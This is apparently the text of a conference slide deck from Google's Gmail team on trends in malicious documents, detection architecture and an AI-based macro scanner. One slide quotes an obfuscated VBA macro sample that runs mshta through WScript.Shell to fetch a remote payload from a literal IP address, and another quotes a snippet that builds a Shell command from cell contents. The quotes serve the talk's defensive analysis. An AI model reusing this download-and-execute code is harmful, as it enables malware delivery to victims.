SLIDE 1
SESSION ID:
Malicious Documents Trends: a Gmail Perspective
HTA-T10
Google, @elie with the help of many Googlers
Malicious Documents Trends: a Gmail Perspective Google, @elie with - - PowerPoint PPT Presentation
Malicious Documents Trends: a Gmail Perspective Google, @elie with - - PowerPoint PPT Presentation
SESSION ID: HTA-T10 Malicious Documents Trends: a Gmail Perspective Google, @elie with the help of many Googlers Slides available here: htups://elie.net/rsa20 In Oct 2019 the Russian sponsored APT group Primitive Bear used obfuscated
SLIDE 2
SLIDE 3
htups://www.anomali.com/fjles/white-papers/Anomali_Threat_Research-Gamaredon_TTPs_Target_Ukraine-WP.pdf
In Oct 2019 the Russian sponsored APT group Primitive Bear used
- bfuscated offjce
documents to target Ukrainian entities
SLIDE 4
Offjce: 56% PDF: 2%
Malicious Documents represent a signifjcant paru of malware targeting our users
SLIDE 5
Every week Gmail scan over 300B+ atuachments for malware
SLIDE 6
Each second we need to process millions of documents in a matuer of milliseconds
SLIDE 7
How Gmail malware detection works
Scanners Decision engine Policy engine
SLIDE 8
How Gmail malware detection works
Policy engine Decision engine Scanners
SLIDE 9
How Gmail malware detection works
Scanners Policy engine Decision engine
SLIDE 10
How Gmail malware detection works
Scanners Policy engine Decision engine
SLIDE 11
How about users and
- rganization at risk of
targeted atuack?
SLIDE 12
Security Sandboxes are used to supplement detection when need.
SLIDE 13
Agenda
Who is targeted by malicious documents? Deconstructing malicious documents campaigns Insights into Gmail next-gen detection
SLIDE 14
Who is targeted by malicious documents?
SLIDE 15
Every type of organization is at risk of being targeted by malicious documents
Education Company Non for profjt Government
SLIDE 16
Education Company Non for profjt Government
Some organizations are more targeted by malicious documents than others
SLIDE 17
Education Finance & Insurance Health Care IT Wholesale Trade Retail Real Estate Manufacturing Utilities Transporuation
Some industries are more targeted by malicious documents than others
SLIDE 18
Prevalence of malicious documents varies drastically from country to country
Indonesia Russia Germany India Japan France USA Finland Great Britain Norway
SLIDE 19
Deconstructing malicious documents campaigns
SLIDE 20
2000 BCE 1200 CE 1800 CE 2020 CE
Cats through the ages
SLIDE 21
63%
- f the malicious docs
blocked by Gmail are difgerent from day to day
SLIDE 22
The volume of malicious document greatly varies from day to day: 3x variation is the normal
SLIDE 23
Locky ransomware
Botnets are the culprits behind some of the massive bursts of malicious emails we observe. Necurs alone was sending 100M locky samples per day in 2016
SLIDE 24
The malicious document threat landscape is very fast-paced and extremely adversarial
SLIDE 25
Kits ofgering weaponized document exploits packed with AV evasion techniques are routinely available on the blackmarket as SaaS for $400-$5000
https://news.sophos.com/en-us/2019/02/14/old-phantom-crypter-upends-malicious-document-tools/?cmp=30728
SLIDE 26
What techniques do those kits use?
SLIDE 27
boazuda = "zTpVrQQvHdVZWEzNCEvrDXMHhcjFYVxXIEEnuDCLMqpbjXqYf hcjFYVxXIEEnucjFYVxXIEEnup://104.144.207.201/cjFYVxXIEEnuron/WEzNCEvrDXMHcjFYVxXIEEnuiELOZqbR QzjYzTpVrQQvHdVZ.php?ucjFYVxXIEEnuzTpVrQQvHdVZDCLMqpbjXqYf=DCLMqpbjXqYfrniELOZqbRQzjY" boazuda = Replace(boazuda, "zTpVrQQvHdVZ", "m") boazuda = Replace(boazuda, "DCLMqpbjXqYf", "a") dzkkGwK = "X" & "p" & "o" boazuda = Replace(boazuda, "WEzNCEvrDXMH", "s") AuOKypAOxXWC = "u" & "x" & Trim("G") LrdizVw = 1418 + 1239 + 1546 + 521 + 1029 iBEFgGzg = 1766 + 1267 + 544 + 1840 boazuda = Replace(boazuda, "cjFYVxXIEEnu", "t") boazuda = Replace(boazuda, "iELOZqbRQzjY", "e") cYqOLzNGqSzN = 110 + 662 + 271 + 430 + 1818 IzdiuFFLcOWX = 1234 - 1771 - 1644 - 1187 boazuda = Replace(boazuda, "dfnAfNznHxFV", "l") yCdrQfLG = "Z" & "y" & Trim("R") & "d" loquaz = "WScripUEAOXJSPZOCg.ShwBfuroncKuUbkjJbOBuEpdFEkjJbOBuEpdFE" loquaz = Replace(loquaz, "DgDdPEVxFMkH", "m") OFNCRKqKF = 1006 + 15 + 215 loquaz = Replace(loquaz, "rTRMGUvpLYHv", "a") TOxTXxovMuOp = 734 + 33 + 1188 + 563 + 716 loquaz = Replace(loquaz, "AdoqkZxrLcFX", "s") loquaz = Replace(loquaz, "UEAOXJSPZOCg", "t") QFMdIPpUYY = 459 - 943 - 977 AUvwcPXcwXb = "E" & "Q" loquaz = Replace(loquaz, "wBfuroncKuUb", "e") iqEyuLuf = "D" & "A" & Trim("O") loquaz = Replace(loquaz, "kjJbOBuEpdFE", "l") uRxRWUfRpSX = Trim("G") & "k" & Trim("G") & Trim("I") jXkIrzM = 128 - 1507 - 70 XjnfDLLd = Trim("k") & "o" & "p" CreateObject(loquaz).Run boazuda, 0 FAcDNuSZHuWp = 1892 - 994 - 435 - 958 - 491 - 1652 - 1245 NbnCVgoojDpO = 1069 + 1656 + 957 + 714 CDDQFoi = 512 + 1320 zCwcBZPYSpI = 1011 - 1218 - 830 - 1495 - 300 - 1268 - 860
Mshta http://104.144.xxx.yyy/tron/stem.php WScript.shell
SLIDE 28
Atuackers try to evade detection by adding malware in XLS cell content.
q = "": m = "" For i = use * 2 To use * 2 + 3 q = q + plumb(Cells(i, use * 2)): m = m + plumb(Cells(i + use / 2, use * 2)) Next i Shell q + cop(use, use) + m, ..
SLIDE 29
63% of malware are difgerent from day to day
Takeaways
Obfuscator and weaponized exploits are readily available
SLIDE 30
Insights into Gmail next-gen malicious document detection
SLIDE 31
Use AI to improve detection
SLIDE 32
Really?
SLIDE 33
Enhance existing detection capabilities with AI interpolation & advanced document analyzers to coverage and to adversarial atuacks
SLIDE 34
APT / 0day Advanced
- bfuscation
Detection TCO
Bulk malware
Defense GAP /
- pporuunity
Gmail detection landscape: today
SLIDE 35
APT / 0day Advanced
- bfuscation
Detection TCO
Bulk malware
AI
Gmail detection landscape: tomorrow
SLIDE 36
How does it work in practice?
SLIDE 37
Feature extractors Document analyzer Machine Learning Transpiler Supervised Execution
Feedback loop for dynamic code (eval)
Anatomy of a document scanner
Macro/script Parsers Macro AST Analyzer
SLIDE 38
How our AI scanner integrate with Gmail malware detection works
Scanners Policy engine Decision engine
SLIDE 39
Does it really work?
SLIDE 40
AI scanner increases Offjce documents with malicious documents detection by ~10% consistently and 150+% at peak
AI only Both Other scanners only
Jan 28 Jan 29 Jan 30 Jan 31 Feb 1 Feb 2 Feb 3 Feb 4 Feb 5 Feb 6 Feb 7 Feb 8 Feb 9 Feb 10 Feb 11 Feb 12 Feb 13 Feb 14 Feb 15 Feb 16 Feb 17 Feb 18 Feb 19 Feb 20 Feb 21 Feb 22 Feb 23 Feb 24
200% 150% 100% 50% 0%
SLIDE 41
Improvement varies by fjletype
10.5% 14.5%
SLIDE 42
How do you build ground truth?
SLIDE 43
Hindsights samples re-evaluation
Re-scan documents at a later stage to give a chance to various scanners to have their false positives fixed
Additional sandbox scans
Scan suspicious and a large subset of documents with sandboxes for additional verdicts
Cluster analysis
Leverage deep-clustering to quickly identify the samples that need to be reviewed to find potential FP / FN
No silver bullet: use a multi prong approach
SLIDE 44
Deep-clustering to scale model improvements
Example of a incorrect extrapolation - .dll in code was considered malicious
SLIDE 45
Malicious documents is a key threat to businesses and end users Robust malicious documents detection requires a defense in depth strategy that combine detection approaches
Takeaways
Adversary continuously shifu their TTP and tweak their payload to avoid detection
SLIDE 46
Robust malicious documents detection requires combining technologies and constant R&D
htups://elie.net/rsa20
SLIDE 47